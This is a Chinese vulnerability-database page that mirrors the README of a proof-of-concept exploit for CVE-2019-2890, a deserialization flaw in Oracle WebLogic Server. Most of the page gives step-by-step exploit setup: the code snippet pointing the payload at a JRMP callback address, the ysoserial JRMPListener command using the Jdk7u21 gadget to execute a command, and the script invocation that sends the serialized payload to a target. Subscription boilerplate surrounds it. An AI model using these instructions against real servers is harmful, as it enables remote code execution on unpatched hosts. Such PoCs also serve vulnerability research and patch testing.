CVE-2019-2890 PoC — Oracle Fusion Middleware WebLogic Server组件安全漏洞

来源

https://github.com/l1nk3rlin/CVE-2019-2890

关联漏洞

标题:Oracle Fusion Middleware WebLogic Server组件安全漏洞 (CVE-2019-2890)
Description:Oracle Fusion Middleware（Oracle融合中间件）是美国甲骨文（Oracle）公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server 10.3.6.0.0版本、12.1.3.0.0版本和12.2.1.3.0版本的Web Services组件存在安全漏洞。攻击者可利用该漏洞控制WebLogic S

介绍

## 声明

仅用于学习交流使用，其他用途后果自负。

## 说明

已经将相关jar文件都导入到了项目中，并且利用方式采用yso的JRMP，学习调试时候可以修改利用方式。

首先需要将weblogic下的 **SerializedSystemIni.dat** 文件放置到 **security** 文件夹下。

然后需要将yso重命名为 **ysoserial.jar** ，并且导入到 **lib** 目录下。

![1](./img/3.png)

其次 **weblogic/wsee/jaxws/persistence/PersistentContext.java** 中的 **getObject** 的IP地址和端口。

```
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }
```

最后远程通过JRMP监听，利用7u21命令执行。

```
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
```

使用方法，运行Poc.java生成poc.ser序列化文件，通过

```
python weblogic.py ip port poc.ser
```

![1](./img/1.png)

![1](./img/2.png)

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看

备注

1. 建议优先通过来源进行访问。

2. 本地 POC 快照面向订阅用户开放；当原始来源失效或无法访问时，本地镜像作为订阅权益的一部分提供。

查看订阅方案 →

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2019-2890 PoC — Oracle Fusion Middleware WebLogic Server组件安全漏洞

来源

关联漏洞

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！